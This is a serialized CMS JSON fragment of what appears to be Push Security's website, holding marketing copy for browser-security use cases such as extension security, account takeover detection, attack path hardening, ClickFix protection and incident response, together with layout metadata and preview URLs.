Push reveals how each extension entered your environment, whether it was installed manually, sideloaded, or deployed in dev mode. You’ll see which users are running what, and where, so you can surface violations, investigate quickly, and respond with confidence.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F229f355be6f243b180f410d237a75bb3",{"large":530},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":532,"meta":533,"component":534,"responsiveStyles":536},"builder-1a689287d1a1418997d57db578a71105",{"previousId":408},{"name":354,"options":535,"isRSC":118},{"darkMode":6},{"large":537},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":539,"component":540,"responsiveStyles":542},"builder-feb4e75029f84c10b6498ef1f8f79128",{"name":416,"tag":416,"options":541,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":543},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":545,"@type":106,"tagName":131,"properties":546,"responsiveStyles":547},"builder-pixel-0edn39avfcei",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":548},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":550},{"path":37,"query":551},{},{},1776275365038,1757000441666,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8d496cf111644ee5afcc046b72d1ca5a",[],{"kind":438,"winningTest":118,"breakpoints":558,"lastPreviewUrl":559,"hasLinks":6,"originalContentId":259,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"https://pushsecurity.com/uc/browser-extension-security?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2Cc
reateProjects%2CsendPullRequests&builder.user.role.name=Designer&builder.user.role.id=creator&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=54f8256648f54d439303734b1e69221b&builder.overrides.54f8256648f54d439303734b1e69221b=54f8256648f54d439303734b1e69221b&builder.overrides.use-case-page:/uc/browser-extension-security=54f8256648f54d439303734b1e69221b&builder.options.locale=Default",{"createdDate":561,"id":562,"name":563,"modelId":261,"published":13,"query":564,"data":567,"variations":670,"lastUpdated":671,"firstPublished":672,"testRatio":33,"screenshot":673,"createdBy":34,"lastUpdatedBy":674,"folders":675,"meta":676,"rev":440},1744923509705,"94bebb7bb99d48629ad157e80cf4d81d","Account takeover detection",[565],{"@type":264,"property":265,"operator":266,"value":566},"/uc/account-takeover-detection",{"title":563,"customFonts":568,"jsCode":37,"seoTitle":563,"seoDescription":573,"fontAwesomeIcon":574,"tsCode":37,"blocks":575,"url":566,"state":667},[569],{"kind":273,"category":295,"variants":570,"menu":296,"files":571,"family":272,"subsets":572,"version":274,"lastModified":275},[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"300italic":293,"500italic":292,"800italic":285,"700italic":287,"italic":289,"900italic":286,"600italic":294,"200italic":291,"regular":290,"100italic":288},[298,299],"Stop ATO with stolen credential and compromised token 
detection.","faUserSecret",[576,662],{"@type":106,"@version":107,"tagName":323,"id":577,"meta":578,"children":579},"builder-e7913a774cae44c5a23d6081c5c30a52",{"previousId":324},[580,596,603,610,619,629,639,649,656],{"@type":106,"@version":107,"id":581,"meta":582,"component":583,"responsiveStyles":594},"builder-f1f1ab1601bc4c0f8c2a8aafd173675d",{"previousId":328},{"name":327,"options":584,"isRSC":118},{"title":563,"description":585,"points":586,"video":593},"\u003Cp>Attackers don’t need to phish, they just need a password that works. Push monitors for signs of credential-based attacks in real time, directly in the browser, catching account takeover attempts before the damage spreads. From ghost logins to credential stuffing, Push cuts off the paths attackers use to quietly slip in the back door.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[587,589,591],{"item":588},"Identify credential-based ATO as it unfolds",{"item":590},"Surface hijacked sessions and token misuse",{"item":592},"Strengthen authentication where your IdP 
can’t","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb4dd9db24bc9495b8a686b1b4d492016%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=b4dd9db24bc9495b8a686b1b4d492016&alt=media&optimized=true",{"large":595},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":597,"meta":598,"component":599,"responsiveStyles":601},"builder-0bc0d1c78ece4994993c3a6427a4d533",{"previousId":344},{"name":346,"options":600,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":602},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":604,"meta":605,"component":606,"responsiveStyles":608},"builder-e45de8f3768c4f16938dbf78e4e87524",{"previousId":352},{"name":354,"options":607,"isRSC":118},{"darkMode":41},{"large":609},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":611,"component":612,"responsiveStyles":617},"builder-c98e8bfd341146c1b67c02d5698ff093",{"name":359,"tag":359,"options":613,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":614,"description":615,"image":616,"reverse":6},"\u003Ch2>Assume less. See more.\u003C/h2>","\u003Cp>Most account takeovers don’t start with a breach, they start with a login. Whether it’s a reused password, a local account, or an outdated login flow, Push shows you how accounts are actually accessed day to day, not just how policies say they should be. 
That means no more blind spots around ghost logins, bypassed SSO, or stale access paths that quietly persist.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F18630ad2746d4eb7b7fcc0428b11a8f0",{"large":618},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":620,"meta":621,"component":622,"responsiveStyles":627},"builder-55c1fc38ddc04fd1a0d6a8e2fb819e00",{"previousId":371},{"name":373,"options":623,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":624,"description":625,"reverse":41,"image":626},"\u003Ch2>Catch stolen credential use in real time\u003C/h2>","\u003Cp>Push monitors login activity directly in the browser to detect signs of credential-based attacks like leaked password use or suspicious login flows. By analyzing attacker TTPs instead of relying on known indicators, Push spots credential stuffing and account takeover attempts the moment they begin, not after they’ve succeeded.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F52b0123cac2c4dfdb1dc0af6adf9d603",{"large":628},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":384,"marginTop":384},{"@type":106,"@version":107,"id":630,"meta":631,"component":632,"responsiveStyles":637},"builder-dfb31737b30948c6b95323655d571a50",{"previousId":386},{"name":373,"options":633,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":634,"description":635,"reverse":6,"image":636},"\u003Ch2>Detect session hijacks and stealth access\u003C/h2>","\u003Cp>Attackers don’t always need a login screen, they often sidestep it entirely using stolen session tokens. 
Push detects when valid sessions are reused in unexpected ways, identifying hijacked sessions and stealth access attempts that traditional tools miss. Because we monitor directly in the browser, you see what’s happening inside active sessions in real time.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F94a6859a99e04d309ffe5841f3dbdf5c",{"large":638},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":640,"meta":641,"component":642,"responsiveStyles":647},"builder-f7585b90eb974d03a7dc7eae5b58d227",{"previousId":397},{"name":373,"options":643,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":644,"description":645,"reverse":41,"image":646},"\u003Ch2>Harden accounts before they’re compromised\u003C/h2>","\u003Cp>Push goes beyond alerts. It identifies apps that still allow local logins, even when SSO is configured, so you can remove weak access paths. 
Push also flags users without MFA, reused work credentials, or weak passwords, and prompts users in-browser to fix risky behaviors before they’re exploited.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F01c1b638f1b6497093a4f2b8ceddb5bb",{"large":648},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":650,"meta":651,"component":652,"responsiveStyles":654},"builder-ad81d1e3afec49a791214194eae09bdc",{"previousId":408},{"name":354,"options":653,"isRSC":118},{"darkMode":6},{"large":655},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":657,"component":658,"responsiveStyles":660},"builder-8dac1aa4b9d148628d92252bd8eff822",{"name":416,"tag":416,"options":659,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":661},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":663,"@type":106,"tagName":131,"properties":664,"responsiveStyles":665},"builder-pixel-s5u3wmvz7jq",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":666},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":668},{"path":37,"query":669},{},{},1770892814499,1745499162732,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F58b660fa94aa4b30b0faeb9b663ae41a","SfUPqW5tkibIPby49keNFMdHFTr1",[],{"lastPreviewUrl":677,"hasLinks":6,"originalContentId":259,"breakpoints":678,"winningTest":118,"kind":438,"hasAutosaves":41},"https://pushsecurity.com/uc/account-takeover-detection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepo
sitory%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=94bebb7bb99d48629ad157e80cf4d81d&builder.overrides.94bebb7bb99d48629ad157e80cf4d81d=94bebb7bb99d48629ad157e80cf4d81d&builder.overrides.use-case-page:/uc/account-takeover-detection=94bebb7bb99d48629ad157e80cf4d81d&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":680,"id":681,"name":682,"modelId":261,"published":13,"query":683,"data":686,"variations":789,"lastUpdated":790,"firstPublished":791,"testRatio":33,"screenshot":792,"createdBy":34,"lastUpdatedBy":674,"folders":793,"meta":794,"rev":440},1745009370904,"23eb48fb56d3451cab77cb6ed140ee6d","Attack path hardening",[684],{"@type":264,"property":265,"operator":266,"value":685},"/uc/attack-path-hardening",{"tsCode":37,"seoDescription":687,"jsCode":37,"customFonts":688,"fontAwesomeIcon":693,"seoTitle":682,"title":682,"blocks":694,"url":685,"state":786},"Harden access paths with visibility, detection, and 
guardrails.",[689],{"kind":273,"files":690,"version":274,"lastModified":275,"subsets":691,"menu":296,"category":295,"variants":692,"family":272},{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"regular":290,"italic":289,"800italic":285,"500italic":292,"600italic":294,"200italic":291,"900italic":286,"700italic":287,"100italic":288,"300italic":293},[298,299],[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],"faRadar",[695,781],{"@type":106,"@version":107,"tagName":323,"id":696,"meta":697,"children":698},"builder-1d8553eddcaa44d7bba9e2f4ca13af2a",{"previousId":577},[699,715,722,729,738,748,758,768,775],{"@type":106,"@version":107,"id":700,"meta":701,"component":702,"responsiveStyles":713},"builder-84fe3d7c85a743cf8cef649aa974f1ef",{"previousId":581},{"name":327,"options":703,"isRSC":118},{"title":682,"description":704,"points":705,"video":712},"\u003Cp>Push continuously monitors your environment for exposed login paths, weak credentials, and missing protections like MFA. 
It detects the gaps attackers exploit and helps you close them before they’re used.\u003C/p>",[706,708,710],{"item":707},"Find weak spots like reused passwords, local logins, and missing MFA",{"item":709},"Monitor how users actually log in across apps, flows, and tools",{"item":711},"Enforce secure access with in-browser guardrails","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fdbdcf52892034f1bbddded77f753a343%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=dbdcf52892034f1bbddded77f753a343&alt=media&optimized=true",{"large":714},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":716,"meta":717,"component":718,"responsiveStyles":720},"builder-b3f66f5b08054cc78a06fecfc3ae2337",{"previousId":597},{"name":346,"options":719,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":721},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":723,"meta":724,"component":725,"responsiveStyles":727},"builder-4c73418b84be49ed85e6e13d2625c5a0",{"previousId":604},{"name":354,"options":726,"isRSC":118},{"darkMode":41},{"large":728},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":730,"component":731,"responsiveStyles":736},"builder-dec0246085e1485c803f7152b1922a81",{"name":359,"tag":359,"options":732,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":733,"description":734,"image":735,"reverse":6},"\u003Ch2>Find the gaps that lead to compromise\u003C/h2>","\u003Cp>Misconfigurations don’t show up in your config files, they show up in how users actually access apps. 
Push monitors real login behavior in the browser, surfacing risky patterns like local login access, duplicate accounts, or missing protections that leave doors wide open.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F309a59bba8d247a19476bb369397460e",{"large":737},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":739,"meta":740,"component":741,"responsiveStyles":746},"builder-ebf049a645604a249550996a88f8f3b6",{"previousId":620},{"name":373,"options":742,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":743,"description":744,"reverse":41,"image":745},"\u003Ch2>See real login behavior\u003C/h2>","\u003Cp>Push watches authentication flows as they happen, giving you a live view of how users log in, which methods they choose, and where protections like MFA are missing. Plus, uncover every app and account in use, even shadow IT you didn’t know existed, without relying on stale config files or IdP assumptions. \u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb51f6b0357cc451b87a7a5016d984e5e",{"large":747},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":383,"marginTop":384},{"@type":106,"@version":107,"id":749,"meta":750,"component":751,"responsiveStyles":756},"builder-431d175c59004669b0b2776b07d71737",{"previousId":630},{"name":373,"options":752,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":753,"description":754,"reverse":6,"image":755},"\u003Ch2>Find and fix posture drift\u003C/h2>","\u003Cp>Security posture isn’t static. Push continuously monitors for issues like missing MFA or legacy login methods. 
When something falls out of policy, you know immediately with custom notifications so you can act before it turns into risk.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F324e39127dfc41e592b1183dfb39892d",{"large":757},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":759,"meta":760,"component":761,"responsiveStyles":766},"builder-3dffdcbe0a484e2ca4c03f019b6d40ee",{"previousId":640},{"name":373,"options":762,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":763,"description":764,"reverse":41,"image":765},"\u003Ch2>Guide users with in-browser guardrails\u003C/h2>","\u003Cp>Push doesn’t just surface problems, it helps you fix them. When users sign in without MFA, reuse a password, or use insecure credentials, Push prompts them directly in the browser to secure their access. It’s faster, more effective, and actually gets 
results.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fee8b75d13e45488aba55434a8b49ebb0",{"large":767},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":769,"meta":770,"component":771,"responsiveStyles":773},"builder-976bc222cd7647ff905f1e01cfedc453",{"previousId":650},{"name":354,"options":772,"isRSC":118},{"darkMode":6},{"large":774},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":776,"component":777,"responsiveStyles":779},"builder-8c47ec2fd0f74382bb3e6c870555632c",{"name":416,"tag":416,"options":778,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":780},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":782,"@type":106,"tagName":131,"properties":783,"responsiveStyles":784},"builder-pixel-7akm7dayau8",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":785},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":787},{"path":37,"query":788},{},{},1770892844854,1745499166112,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6ca12bf728a045f1a31d40c0beb3bfe5",[],{"kind":438,"lastPreviewUrl":795,"breakpoints":796,"hasLinks":6,"originalContentId":562,"winningTest":118,"hasAutosaves":6},"https://pushsecurity.com/uc/attack-path-hardening?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&buil
der.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=23eb48fb56d3451cab77cb6ed140ee6d&builder.overrides.23eb48fb56d3451cab77cb6ed140ee6d=23eb48fb56d3451cab77cb6ed140ee6d&builder.overrides.use-case-page:/uc/attack-path-hardening=23eb48fb56d3451cab77cb6ed140ee6d&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":798,"id":799,"name":800,"modelId":261,"published":13,"query":801,"data":804,"variations":909,"lastUpdated":910,"firstPublished":911,"testRatio":33,"screenshot":912,"createdBy":34,"lastUpdatedBy":674,"folders":913,"meta":914,"rev":440},1761675020232,"ea4f309d2ffe46c5aa97ebf0fda4e2e3","ClickFix Protection",[802],{"@type":264,"property":265,"operator":266,"value":803},"/uc/clickfix-protection",{"seoDescription":805,"fontAwesomeIcon":806,"customFonts":807,"seoTitle":812,"jsCode":37,"tsCode":37,"title":812,"blocks":813,"url":803,"state":906},"Block attacks that trick users into running malicious code.","faLaptopCode",[808],{"files":809,"subsets":810,"menu":296,"version":274,"kind":273,"family":272,"lastModified":275,"variants":811,"category":295},{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"200italic":291,"800italic":285,"700italic":287,"600italic":294,"100italic":288,"italic":289,"regular":290,"300italic":293,"500italic":292,"900italic":286},[298,299],[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],"ClickFix 
protection",[814,901],{"@type":106,"@version":107,"tagName":323,"id":815,"meta":816,"children":817},"builder-d7eefdde0f2a4b2b9de3dcb2978fd6cb",{"previousId":696},[818,834,841,848,858,868,878,888,895],{"@type":106,"@version":107,"id":819,"meta":820,"component":821,"responsiveStyles":832},"builder-56e2c54bcce040a4af8b92ae03706c12",{"previousId":700},{"name":327,"options":822,"isRSC":118},{"title":812,"description":823,"points":824,"image":831},"\u003Cp>ClickFix attacks are one of the fastest-growing threats, tricking users into copying malicious code from a webpage and running it locally. This technique bypasses traditional EDR, email gateways, and network filters, leading directly to ransomware and data theft. Push stops this attack at the source, in the browser, by detecting and blocking the malicious behavior before the user can ever paste the code.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[825,827,829],{"item":826},"Detect ClickFix, FileFix, and fake CAPTCHA in the browser",{"item":828},"Block malicious copy-and-paste actions before code is executed",{"item":830},"See full telemetry into which users were targeted and what they 
saw","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b74af62889847ebb3927364485b0546",{"large":833},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":835,"meta":836,"component":837,"responsiveStyles":839},"builder-05f9614d4e3e4dc88b3ee8658f54e10e",{"previousId":716},{"name":346,"options":838,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":840},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":842,"meta":843,"component":844,"responsiveStyles":846},"builder-c4fb5179366243c1b6c32d368675cf47",{"previousId":723},{"name":354,"options":845,"isRSC":118},{"darkMode":41},{"large":847},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":849,"meta":850,"component":851,"responsiveStyles":856},"builder-261af50705fd445d8cca4a6ba20d5391",{"previousId":730},{"name":359,"tag":359,"options":852,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":853,"description":854,"reverse":6,"image":855},"\u003Ch2>Stop ClickFix-style attacks before they become a breach\u003C/h2>","\u003Cp>Traditional security tools are blind to malicious copy and paste attacks because the attack exploits a gap between the browser and the endpoint. 
EDR only sees the payload after it runs, and network tools see only part of the picture.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F98b2f7e08dec4eafaf8e24937605b8cf",{"large":857},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":859,"meta":860,"component":861,"responsiveStyles":866},"builder-7d21b8aab8064c40b1e5dd23c4749309",{"previousId":739},{"name":373,"options":862,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":863,"description":864,"reverse":41,"image":865},"\u003Ch2>Discover lures at the source\u003C/h2>","\u003Cp>Push inspects page behavior to identify ClickFix attacks as they happen. By inspecting the page, its structure, and how the user interacts with it, Push can detect and block these in-browser threats in real time. This deep, TTP-based inspection spots the trap even on novel pages that are built to bypass traditional web filters and blocklists.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F665bf47e01544c75bf9ddafd3917927b",{"large":867},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":383,"marginTop":384},{"@type":106,"@version":107,"id":869,"meta":870,"component":871,"responsiveStyles":876},"builder-fb91943adf6149259ed9e1e6566c9afe",{"previousId":749},{"name":373,"options":872,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":873,"description":874,"reverse":6,"image":875},"\u003Ch2>Block the malicious action\u003C/h2>","\u003Cp>When Push detects a malicious script, it intercepts the user's action and blocks the code from being copied to the clipboard. The user is protected, the attack is stopped, and no malicious code ever reaches the endpoint. 
Unlike broad DLP tools, this action is surgical, targeting only malicious behavior without disrupting normal work.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F5ee68f81f1ac416685cbfe91298cf827",{"large":877},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":879,"meta":880,"component":881,"responsiveStyles":886},"builder-bfac95fada864e5a8259b955b5b5f98b",{"previousId":759},{"name":373,"options":882,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":883,"description":884,"reverse":41,"image":885},"\u003Ch2>Accelerate ClickFix investigations\u003C/h2>","\u003Cp>When an attack happens, knowing what the user saw or did is critical. Push provides rich browser session data for rapid investigation and containment. Security teams get detailed telemetry on which users were targeted, what lure they were served, and when the block occurred. 
This enables defenders to reconstruct what happened and respond quickly, even when other tools miss the activity entirely.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6cdf2a8aeddc4e9a9023cbf974e40239",{"large":887},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":889,"meta":890,"component":891,"responsiveStyles":893},"builder-136892e831684a6987f87d3be67c33d1",{"previousId":769},{"name":354,"options":892,"isRSC":118},{"darkMode":6},{"large":894},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":896,"component":897,"responsiveStyles":899},"builder-dec26b739f2f42beb5a73cfc6c675b60",{"name":416,"tag":416,"options":898,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":900},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":902,"@type":106,"tagName":131,"properties":903,"responsiveStyles":904},"builder-pixel-zzjpxxgrc2l",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":905},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":907},{"path":37,"query":908},{},{},1770892881888,1761847585203,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F375467b8bef34ed1a8a1cc5b8b67d75f",[],{"lastPreviewUrl":915,"originalContentId":681,"winningTest":118,"hasLinks":6,"kind":438,"breakpoints":916,"hasAutosaves":6},"https://pushsecurity.com/uc/clickfix-protection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.u
ser.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.overrides.ea4f309d2ffe46c5aa97ebf0fda4e2e3=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.overrides.use-case-page:/uc/clickfix-protection=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":918,"id":919,"name":920,"modelId":261,"published":13,"query":921,"data":924,"variations":1029,"lastUpdated":1030,"firstPublished":1031,"testRatio":33,"screenshot":1032,"createdBy":34,"lastUpdatedBy":674,"folders":1033,"meta":1034,"rev":440},1745009743870,"a9d5556e77f84a37b5bd52310a7110c1","Incident response",[922],{"@type":264,"property":265,"operator":266,"value":923},"/uc/incident-response",{"seoDescription":925,"customFonts":926,"title":920,"jsCode":37,"fontAwesomeIcon":931,"seoTitle":932,"tsCode":37,"blocks":933,"url":923,"state":1026},"Investigate and respond faster with unique browser telemetry.",[927],{"kind":273,"subsets":928,"menu":296,"variants":929,"category":295,"family":272,"version":274,"lastModified":275,"files":930},[298,299],[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"900italic":286,"600italic":294,"200italic":291,"300italic":293,"100italic":288,"700italic":287,"800italic":285,"regular":290,"italic":289,"500italic":292},"faSatelliteDish","Browser-based incident 
response",[934,1021],{"@type":106,"@version":107,"tagName":323,"id":935,"meta":936,"children":937},"builder-653c4aed737b4def88dc4cd2d695660a",{"previousId":696},[938,955,962,969,978,988,998,1008,1015],{"@type":106,"@version":107,"id":939,"meta":940,"component":941,"responsiveStyles":953},"builder-18190bd36518467d9154d27d7e945b9b",{"previousId":700},{"name":327,"options":942,"isRSC":118},{"title":943,"description":944,"points":945,"video":952},"Browser-based incident response","\u003Cp>Push gives you real-time visibility into what actually happened during a breach, right in the browser where the attack played out. From credential theft to session hijacking, Push captures high-fidelity telemetry so you can investigate quickly, contain confidently, and shut it down before it spreads.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[946,948,950],{"item":947},"Reconstruct what happened with real browser session context",{"item":949},"Investigate faster with real-world session context",{"item":951},"Trigger response actions automatically through your SIEM or 
